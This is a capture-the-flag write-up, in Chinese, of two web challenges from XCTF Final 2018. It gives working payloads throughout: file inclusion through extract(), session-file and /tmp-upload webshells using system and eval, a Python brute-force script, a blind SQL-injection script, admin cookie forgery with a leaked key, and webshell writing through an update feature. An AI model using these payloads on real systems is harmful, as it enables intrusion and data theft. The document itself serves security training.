XCTF Final 2018 Web Writeup (Bestphp与PUBG详解)
WEB1——Bestphp
这道题提供index.php源码
index.php
<?php
highlight_file(__FILE__);
error_reporting(0);
ini_set('open_basedir', '/var/www/html:/tmp');
$file = 'function.php';
$func = isset($_GET['function'])?$_GET['function']:'filters';
call_user_func($func,$_GET);
include($file);
session_start();
$_SESSION['name'] = $_POST['name'];
if($_SESSION['name']=='admin'){
header('location:admin.php');
}
?>解题思路一
变量覆盖,调用文件包含
从index.php可以看出$_GET['function']和$_SESSION['name'] = $_POST['name']可控
其中call_user_func($func,$_GET);回调函数可利用
而且include($file);调用了文件包含
所以,可以调用变量覆盖函数,覆盖掉$file,从而引入文件包含
payload:
http://10.99.99.16/?function=extract&file=php://filter/read=convert.base64-encode/resource=./function.php
一开始只是highlight_file给出index.php的源码,利用文件包含读到了admin.php和function.php的源码,不过对解题没啥卵用。
function.php
<?php
function filters($data){
foreach($data as $key=>$value){
if(preg_match('/eval|assert|exec|passthru|glob|system|popen/i',$value)){
die('Do not hack me!');
}
}
}
?>admin.php
hello admin
<?php
if(empty($_SESSION['name'])){
session_start();
#echo 'hello ' + $_SESSION['name'];
}else{
die('you must login with admin');
}
?>吐槽点:早上题目的环境是php7.2,extract函数是无法动态调用的,然后中午主办方偷偷改了环境为7.0,也不发公告说一声,浪费了很多时间。
调用session_start方法,修改session位置
从index.php可以看出$_SESSION['name'] = $_POST['name'],session的值可控,session默认的保存位置
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/var/lib/php5/sess_PHPSESSID
/var/lib/php5/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID由于ini_set('open_basedir', '/var/www/html:/tmp'),我们包含不了/var/lib/下的session
但是我在tmp下也找不到自己的session,所以这里的session应该是在/var/lib/下
这里可以调用session_start函数,修改session的位置
本地的payload:
POST /xctf-bestphp/index.php?function=session_start&save_path=. HTTP/1.1
Host: 127.0.0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 21
Cookie: PHPSESSID=lfc5uk0rv8ndmjfv86u9tv6fk2
Content-Type: application/x-www-form-urlencoded
name=<?php phpinfo();
这里直接把session写到了web根目录,并且内容可控
文件包含session,getshell
http://10.99.99.16/index.php?function=extract&file=./sess_lfc5uk0rv8ndmjfv86u9tv6fk2
比赛的payload
POST /index.php?function=session_start&save_path=/tmp HTTP/1.1
Host: 10.99.99.16
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a9tvfth9lfqabt9us85t3b07s1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
name=<?php echo "aaa";system($_GET[x]);?>GET /index.php?function=extract&file=/tmp/sess_a9tvfth9lfqabt9us85t3b07s1&x=cat+sdjbhudfhuahdjkasndjkasnbdfdf.php HTTP/1.1
Host: 10.99.99.16
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a9tvfth9lfqabt9us85t3b07s1
Upgrade-Insecure-Requests: 1解题思路二
php7.0的bug
王一航师傅发过一篇文章:https://www.jianshu.com/p/dfd049924258
是php7的一个小bug
include.php?file=php://filter/string.strip_tags/resource=/etc/passwdstring.strip_tags可以导致php7在执行过程中奔溃
如果请求中同时存在一个文件上传的请求 , 这个文件就会被因为奔溃被保存在/tmp/phpXXXXXX(XXXXXX是数字+字母的6位数)
这个文件是持续保存的,不用竞争,直接爆破,为了爆破成功可以多线程去上传文件,生成多个phpXXXXXX
burp多线程上传文件
POST /index.php?function=extract&file=php://filter/string.strip_tags/resource=function.php HTTP/1.1
Host: 10.99.99.16
Content-Length: 1701
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeScXqSzdW2v22xyk
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: PHPSESSID=17qpuv1r8g19pm503593nddq10
Connection: close
------WebKitFormBoundaryeScXqSzdW2v22xyk
Content-Disposition: form-data; name="fileUpload"; filename="test.jpg"
Content-Type: image/jpeg
<?php echo "wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww";@eval($_POST['cmd']); ?>
------WebKitFormBoundaryeScXqSzdW2v22xyk--爆破脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import string
charset = string.digits + string.letters
host = "10.99.99.16"
port = 80
base_url = "http://%s:%d" % (host, port)
def brute_force_tmp_files():
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = i + j + k + l + m + n
url = "%s/index.php?function=extract&file=/tmp/php%s" % (
base_url, filename)
print url
try:
response = requests.get(url)
if 'wwwwwwwwwwwwww' in response.content:
print "[+] Include success!"
return True
except Exception as e:
print e
return False
def main():
brute_force_tmp_files()
if __name__ == "__main__":
main()getshell
爆破成功后,得到成功文件包含的shell
http://10.99.99.16/index.php?function=extract&file=/tmp/phpXXXXXWEB2——PUBG
赛题提供了源码
https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/www.zip
但是zend加密了,给出解密后的代码,但是变量名还是混淆的
https://github.com/aye-whitehat/CTF-Collection/blob/master/XCTF%20Final%202018/web/PUBG/DECODE.zip
环境还没关,复现记得修改下host 159.138.22.212 guaika.txmeili.com
这题在比赛的时候利用的漏洞链是:sql注入+cookie伪造+后台getshell
解题思路
sql注入
代码位于 kss_inc/payapi_return2.php
关键代码:
这里的post参数没有调用该框架的sql过滤器,只是进行简单的trim()处理
else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" )
{
$_obfuscate_kpGPh4mNh46SkZONh4eLlJU� = "";
$_obfuscate_k42NkY2RkoiNjJCKlZSKiIg� = trim( $_POST['SerialNo'] );
$_obfuscate_iJWMjIiVi5OGjJOViY2Li48� = $_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�;
$_obfuscate_iIuQkYaUioqGlI6IjIuMiI8� = trim( $_POST['Status'] );
$_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU� = trim( $_POST['Money'] );
$_obfuscate_lIuQk5OGjpKVjY6UiI_QjJM� = $_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�;
$_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� = trim( $_POST['VerifyString'] );VerifyString的计算规则
else if ( $_obfuscate_kYyPkY_PkJKVh4qGjJGIio4� == "e138" )
{
$_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = TRUE;
if ( $_obfuscate_iImJjYmQjYyOjIuVkIuMjIs� != strtolower( md5( "SerialNo=".$_obfuscate_k42NkY2RkoiNjJCKlZSKiIg�."&UserID=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set']."&Money=".$_obfuscate_jpGJk5SSkJOIk4iQiI_OhpU�."&Status=".$_obfuscate_iIuQkYaUioqGlI6IjIuMiI8�."&AttachString=e138&MerchantKey=".$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138key'] ) ) )
{
$_obfuscate_k4mJh5SPkY6Vh4qHjIaJh44� = FALSE;
}因为设置了AttachString=e138
所以$_obfuscate_jI2JlY_QkoeQj5OLjouLlYo�['e138set']值为1
所以VerifyString的值为strtolower(md5('SerialNo=1&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1'))
即为ebd95c4233e8c02fe0854306afd71bee
但其实我们只要把参数都找到就ok了,因为不会先验证VerifyString,而是先验证SerialNo和Money参数
造成sql注入的代码如下:
$_obfuscate_lZGQj4iOj4mTlZGNjZGUj5E� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_order where ordernum='".$_obfuscate_iJWMjIiVi5OGjJOViY2Li48�."'" );payload:
http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php
注入点在SerialNo
SerialNo=0'or(0)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71beeSerialNo=1'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
尝试注入得到admin的密码
kss_inc/db_function.php 中可以看到登陆逻辑
if ( empty( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� ) )
{
$_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k� = $_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_iY6OkJCRkY2PjpCPk5CRkJA�( "select * from kss_tb_manager where id=1" );
if ( $_obfuscate_lIqUlIaMj4aNjJCRkoeJlJE� != md5( $_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['username'].$_obfuscate_h5SQiYyTkY_PjYmRjZWPh4k�['password'] ) )
{
_obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "你的原始身份效验失败!" );
}
$_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['level'] = 9;
$_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['powerlist'] = "admin";
}表名是 kss_tb_manager,字段是username和password,id是1
注入脚本 aye.py
#! coding:utf-8
import requests
import sys
if sys.getdefaultencoding() != 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8')
def main():
url="http://guaika.txmeili.com:8888/kss_inc/payapi_return2.php"
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
result=''
for i in range(1,1000):
i =str(i)
for j in chars:
j=ord(j)
#SerialNo=0'or(1)#&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71bee
payload = """0'or(ascii(substr((select(concat(username,0x3a,password))from(kss_tb_manager)where(id=1)),%s,1))=%s)#"""%(i,j)
data = {'SerialNo': payload,
'UserID' : 1,
'Money' : 100,
'Status' : 1,
'AttachString' : 'e138',
'MerchantKey' : 1,
'VerifyString' : 'ebd95c4233e8c02fe0854306afd71bee',
}
#print payload
do_whlie = True
while do_whlie:
try:
r=requests.post(url,data=data)
if r.status_code == 200:
do_whlie = False
except Exception as e:
print str(e)
#print r.text
if '订单金额不符' in r.text:
result += chr(j)
#print r.text
print result
if __name__ == "__main__":
main()
得到账号密码:
axing:8ccf03839a8c63a3a9de17fa5ac6a192
密码在somd5解密得到axing147258
但是登陆不了。。。。赛后跟出题人交流才知道,他把管理员的密码和安全码最后一个字节改了,坑爹的是cmd5和somd5只是取了md5中间的16位进行相似匹配,允许误差
所以数据库92结尾的md5是反解不了的
这里也可以用sqlmap直接跑,就是要加上一些参数,不然跑不出来
sqlmap -r burp.txt -p SerialNo --dbms mysql --risk 3 --level 5 --string="订单金额不符" --technique B
POST /kss_inc/payapi_return2.php HTTP/1.1
Host: guaika.txmeili.com:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
SerialNo=0&UserID=1&Money=100&Status=1&AttachString=e138&MerchantKey=1&VerifyString=ebd95c4233e8c02fe0854306afd71beecookie伪造
代码位于kss_inc/function.php
有setcookie_function(包含禁ip的逻辑)
function _obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs� )
{
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE );
if ( BINDIP == 1 )
{
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY._obfuscate_jZKKjpCGkZSUj4aOiIePlZI�( ) ), 0, "/", NULL, NULL, TRUE );
}
else
{
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE );
}
return $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY;
}位于kss_admin/index.php
调用了setcookie_function
_obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );
$_obfuscate_jIaUiIeSjZWKlIqLkIqOioc�->_obfuscate_kpSOj5KVio2Hj4uKj4_KjIY�( "update kss_tb_manager set `linecode`='".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�."',`lastlogintime`='"._obfuscate_jZGJkpOSkY_HiY2HjY2JlIg�( )."',`lastloginip`=".$_obfuscate_kYmJjZOIiZKJioqMkoaGiYk�." where `id`=".$_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'], "notsync" );
$_obfuscate_i4mRjZCJlZCGk4_UioyHk4k�['logintype'] = 1;
_obfuscate_jYuKk4uOiYmSkpOTj5GUlZA�( $_obfuscate_i4mRjZCJlZCGk4_UioyHk4k� );
$_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� = $_obfuscate_kY_OlYeUlIiVjo6Hio_MkpI�['id'].",".$_obfuscate_h4eSk4uGiZCKhoyNkIiTlI8�.",".md5( $_obfuscate_jZOIiIiJkJOGiY_KjoaGh4c� ).",".$_obfuscate_kI6PjYmLhpGMk4qGjZSHlIg�;
_obfuscate_jZKVlY6HkYmKkIyRj4qSjIc�( "kss_manager", $_obfuscate_i4qGi5WLhoqPkoyGkoiMhpU� );其实就是调用了
setcookie_function( "kss_manager",$id.",".$username.",".md5($password).",".$linecode"
然后执行两句setcookie,得到kss_manager和kss_manager_ver两个cookie
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�, $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�, 0, "/", NULL, NULL, TRUE );
setcookie( $_obfuscate_iYyTho_HlJCOh4yRj4ePj4k�."_ver", md5( $_obfuscate_ipCJlJOSlJSQkYqNlYqKlIs�.COOKKEY ), 0, "/", NULL, NULL, TRUE )并且在 kss_inc/_config.php找到$COOKKEY的值 XIpCcfoe_y43
define( "COOKKEY", "XIpCcfoe_y43" );
define( "COOKKEY2", "MGHOu2m|oXDz" );也在 kss_inc/db_function.php
找到了$linecode的值 efefefef
if ( $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['linecode'] != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && "efefefef" != $_obfuscate_h4_NjYiIi46Lh5KHkoaKkZQ�[3] && $_obfuscate_lI6OiJSPjZWVi5GQhoiPjpU�['username'] != "test01" )
{
_obfuscate_kYyOhouLjo2Gh4eNj4iQlIg�( "您的帐号被挤下线,<a href=index.php target=_top>请重新登陆</a>" );
}所以最终的两个cookie的键值分别是
kss_manager
1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef
kss_manager_ver
md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef"."XIpCcfoe_y43")
即为
md5("1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefefXIpCcfoe_y43")
即为
b05a94ffcb3da369a828235012990953成功伪造cookie,访问 kss_admin/admin.php
浏览器替换cookie
后台getshell
代码位于 kss_admin/admin_update
这个网站的更新,是从远端主站拉取代码写入本地:
$_obfuscate_koiKkIiPjI6UkYeRlIqNhoc� = _obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc�( "http://api.hphu.com/import/".$_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�.".php?phpver=".PHP_VERSION."&webid=".WEBID."&rid=".time( ), 300 );我们跟入_obfuscate_lY6Gk5KMkYmPjIyPhpCOlYc�函数
位于第20行,函数中有curl相关的操作
curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_HEADERFUNCTION, "read_header" );
curl_setopt( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, CURLOPT_WRITEFUNCTION, "read_body" );看下read_body函数
function read_body( $_obfuscate_joiNh4aIhouViZGQho_JiI4�, $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� )
{
global $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�;
global $_obfuscate_j4eNjZOQlIuKhoqMj4mOjYs�;
global $_obfuscate_koaSiYqGjIqMiZSLk4uGiZU�;
if ( $_obfuscate_ko6MhoiQkJKRlYeVio_JjYo� == 0 && substr( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, 0, 2 ) == "<!" )
{
$_obfuscate_j4eNjZOQlIuKhoqMj4mOjYs� = 0;
}
$_obfuscate_ko6MhoiQkJKRlYeVio_JjYo� += strlen( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� );
file_put_contents( KSSROOTDIR."kss_tool".DIRECTORY_SEPARATOR."_webup.php", $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, FILE_APPEND );
echo "<script>$('#downsize').html('".$_obfuscate_ko6MhoiQkJKRlYeVio_JjYo�."');</script>";
echo "<!-- ".str_repeat( " ", 2000 )." -->\r\n";
ob_flush( );
flush( );
return strlen( $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM� );
}其中read_body函数会将curl到的内容写到 kss_tool/_webup.php
file_put_contents( KSSROOTDIR."kss_tool".DIRECTORY_SEPARATOR."_webup.php", $_obfuscate_jJWMiJWJjoyIkYmLjY6VipM�, FILE_APPEND );这里我们可以利用代码中的sql过滤器,去触发某个页面的sql报错,从而将php代码回显,从而将恶意代码写入kss_tool/_webup.php,构造webshell
例子:
构造sql报错并回显
http://api.hphu.com/test/kss_admin/index.php?action=aye666%27
构造更新路径
将报错的页面内容写入 kss_tool/_webup.php
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action=aye666%27
触发phpinfo
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action='<?php%2520phpinfo();?>
写shell
http://guaika.txmeili.com:8888/kss_admin/admin_update.php?pakname=../test/kss_admin/index.php?action='<?php%2520eval($_POST[aye]);echo%2520"aye666"?>
连接菜刀:http://guaika.txmeili.com:8888/kss_tool/_webup.php
getflag
